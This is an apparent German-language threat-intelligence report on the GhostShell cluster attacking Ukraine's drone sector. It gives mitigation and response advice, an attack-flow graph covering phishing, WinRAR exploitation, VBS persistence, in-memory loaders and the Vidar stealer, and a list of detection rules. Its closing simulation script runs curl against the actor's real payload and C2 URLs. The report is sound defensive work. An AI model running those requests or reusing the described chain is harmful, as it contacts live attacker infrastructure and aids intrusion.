GhostShell (MB-0009): Angriff auf die Drohnenoperationen und die Verteidigungslieferkette der Ukraine
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein neu verfolgter Bedrohungscluster, bekannt als GhostShell, zielt auf das ukrainische UAV- und umfassendere Drohnen-Ökosystem. Die Operation nutzt fortschrittliche Malware, darunter mTLS-authentifizierte Implantate und speicherresidente Loader. Um anfänglichen Zugriff zu erhalten, verlassen sich die Angreifer auf Ablenkungsdokumente, die ein ukrainisches Drohnenunternehmen imitieren.
Untersuchung
Der Analyst entdeckte eine mehrstufige Eindringungskette, die auf VBS-Skripten basiert, mTLS-aktivierten Implantaten wie 122.exe, und auf Telegram basierenden Loadern einschließlich update.exe. Reverse Engineering zeigte benutzerdefinierte XOR-Entschlüsselungslogik, einen eingebetteten privaten PKI und die Verwendung von Xray Core für verdecktes Tunneln. Die Untersuchung identifizierte auch Aktivitäten des Vidar-Informationsdiebstahls innerhalb derselben Infrastruktur.
Minderung
Organisationen sollten strikte mTLS-Zertifikatvalidierung durchsetzen und die unbefugte Verwendung von Client-Zertifikaten überwachen. Die Sichtbarkeit der Endpunkte sollte verbessert werden, um das Laden im Speicher zu erkennen, ntdll.dll Unhooking und verdächtige Änderungen an der Persistenz des Windows-Ausführungsschlüssels. Teams sollten auch auf abnormale ausgehende Datenverkehr zu bekannten Command-and-Control-Domänen und auf Telegram-basierter Konfigurationsabruf achten.
Reaktion
Betroffene Systeme sollten sofort isoliert werden, gefolgt von Speicherforensik, um im Speicher befindliche Implantate zu identifizieren. Netzwerkprotokolle sollten auf Datenverkehr überprüft werden, der mit umfasst cloudaxis.cc and cdnexpress.cc. Sicherheitsteams sollten auch die referenzierten SHA-256-Hashes suchen und das spezifische mTLS-Client-Zertifikat überwachen CN=ed6e62814295701f.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Initial Access and Execution Phase action_phishing["<b>Aktion</b> – <b>T1566.001 Phishing: Spearphishing-Anhang</b><br/>Beschreibung: Social Engineering mit Ablenkungs-PDF-Dokumenten<br/>die Besomar imitieren, um auf das UAV-Ökosystem abzuzielen."] class action_phishing action action_exploit["<b>Aktion</b> – <b>T1203 Ausnutzung zur Client-Ausführung</b><br/>Beschreibung: Ausnutzung der CVE-2025-8088 und CVE-2025-6218<br/>über das bösartige Archiv Besomar_documentation.rar."] class action_exploit action process_vbs["<b>Prozess</b> – <b>T1059.005 Befehl und Skript-Interpreter: Visual Basic</b><br/>Beschreibung: VBS-Datei, die im Windows-Startup-Ordner abgelegt<br/>Base64-codierte Zeichenfolgen über ExecuteGlobal ausführt."] class process_vbs process %% Persistence and Payload Download action_persistence_startup["<b>Aktion</b> – <b>T1547.001 Boot- oder Anmeldeautomatisierungs-Ausführung: Registry Run Keys / Startup-Ordner</b><br/>Beschreibung: VBS-Datei im Startup-Ordner für Persistenz platziert."] class action_persistence_startup action network_download["<b>Netzwerk</b> – <b>T1105 Eingehende Toolübertragung</b><br/>Beschreibung: Herunterladen von Sekundär-Payloads von cloudaxis.cc."] class network_download network op_branch(("UND")) class op_branch operator %% Path 1: 122.exe malware_122["<b/>Name: 122.exe<br/>Beschreibung: Loader, der ein eingebettetes PE mit XOR entschlüsselt<br/>und es im Speicher ausführt."] class malware_122 malware action_fingerprint["<b/>Aktion: Host-Fingerabdruck<br/>Beschreibung: Sammlung des Computernamens, Benutzernamens und PID."] class action_fingerprint action network_c2_122["<b/>C2-Kommunikation: cdnexpress.cc<br/>Beschreibung: Verwendet einzigartiges mTLS-Client-Zertifikat zur Authentifizierung."] class network_c2_122 network action_screen_cap["<b/>Aktion: Bildschirmaufnahme<br/>Beschreibung: Aufnahme von Bildschirmen über GDI+."] class action_screen_cap action action_persistence_reg["<b/>Aktion: Registry Run Keys<br/>Beschreibung: Etablieren der Persistenz über Windows Registry Run Keys."] class action_persistence_reg action %% Path 2: update.exe malware_update["<b/>Name: update.exe<br/>Beschreibung: Im Speicher befindlicher Loader, der C2-Konfiguration von Telegram abruft."] class malware_update malware action_anti_analysis["<b/>Aktion: <b>T1562.001 Verteidigungen beeinträchtigen: Tools deaktivieren oder ändern</b><br/>Beschreibung: Unhooking von EDR/Überwachungstools durch Patchen von ntdll.dll."] class action_anti_analysis action action_metasploit_stager["<b/>Aktion: <b>T1059.003 Befehl und Skript-Interpreter: Windows-Befehlszeile</b><br/>Beschreibung: Führt einen Metasploit-ähnlichen HTTPS-Stager im Speicher aus."] class action_metasploit_stager action %% Path 3: 22.exe und Vidar malware_22["<b/>Name: 22.exe<br/>Beschreibung: Mehrstufiger Launcher, der den Xray Core-Client verwendet."] class malware_22 malware network_vless["<b/>Netzwerk: <b>T1573 Verschlüsselter Kanal</b><br/>Beschreibung: Tunnelt Datenverkehr über eine VLESS-Verbindung."] class network_vless network malware_vidar["<b/>Name: Vidar Malware<br/>Beschreibung: Ein Werkzeug zum Diebstahl von Anmeldeinformationen und Daten, das auf Browser<br/>Passwörter, Cookies, Wallets und Messaging-Artefakte abzielt."] class malware_vidar malware %% Verbindungslogik action_phishing –>|führt_zu| action_exploit action_exploit –>|führt_zu| process_vbs process_vbs –>|verwendet| action_persistence_startup action_persistence_startup –>|triggert| network_download network_download –>|liefert| op_branch %% Pfad zu Payloads op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% 122.exe-Ablauf malware_122 –>|führt_aus| action_fingerprint malware_122 –>|kommuniziert_mit| network_c2_122 malware_122 –>|kann| action_screen_cap malware_122 –>|garantiert| action_persistence_reg %% update.exe-Ablauf malware_update –>|ruft_ab_von| action_anti_analysis action_anti_analysis –>|führt_aus| action_metasploit_stager %% 22.exe-Ablauf malware_22 –>|tunnelt_über| network_vless network_vless –>|setzt_ein| malware_vidar "
Angriffsablauf
Erkennungen
Kurzer Dateiname (über cmdline)
Ansehen
LOLBAS WScript / CScript (über process_creation)
Ansehen
Verdächtige CURL-Nutzung (über cmdline)
Ansehen
Verdächtige Binärdateien / Skripte im Autostart-Verzeichnis (über file_event)
Ansehen
Möglicher Telegram-Missbrauch als Command-And-Control-Kanal (über dns_query)
Ansehen
Möglicher CVE-2025-8088 / CVE-2025-6218 (WinRAR-Schwachstellen) Ausnutzungsversuch (über file_event)
Ansehen
Verdächtige Command-and-Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)
Ansehen
Erkennung von Kommunikation und Payload-Download aus der GhostShell-Infrastruktur [Windows-Netzwerkverbindung]
Ansehen
GhostShell Malware-Persistenz über den Startup-Ordner [Windows-Dateievent]
Ansehen
Simulationsausführung
Voraussetzung: Die Telemetrie- und Basislinien-Vorflugüberprüfung muss bestanden sein.
Rationale: Dieser Abschnitt beschreibt die genaue Ausführung der Gegner-Taktik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen die genaue Telemetrie erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffsnarrativ & Befehle: Der Gegner hat einen ersten Zugriff erlangt und versucht, eine spezialisierte Nutzlast (
122.exe) herunterzuladen, um die Kontrolle über das Ziel zu festigen. Um unauffällig zu bleiben, nutzt die Malware eine gehackte oder scheinbar legitime CDN-Domain (cloudaxis.cc). Nach dem Download versucht die Malware, ein „Heartbeat“ oder Telemetrie an die C2-Infrastruktur über einen bestimmten Analytics-Endpunkt zu senden (cdnexpress.cc/analytics). Die Simulation wirdcurlverwenden, um diese spezifischen GET-Anfragen zu imitieren und so die URI-basierte Erkennungslogik auszulösen. -
Regressionstest-Skript:
# Simulation des GhostShell Payload-Downloads Write-Host "[+] Simuliere GhostShell Payload-Download..." curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe" # Simulation der GhostShell C2-Kommunikation (Analytics) Write-Host "[+] Simuliere GhostShell C2-Kommunikation..." curl.exe -I "https://cdnexpress.cc/analytics" -
Bereinigungskommandos:
# In dieser Simulation werden keine Dateien tatsächlich heruntergeladen (Verwendung von -I für Header nur) # Es werden keine permantenten Änderungen am System vorgenommen. Write-Host "[+] Simulation abgeschlossen. Keine Bereinigung erforderlich."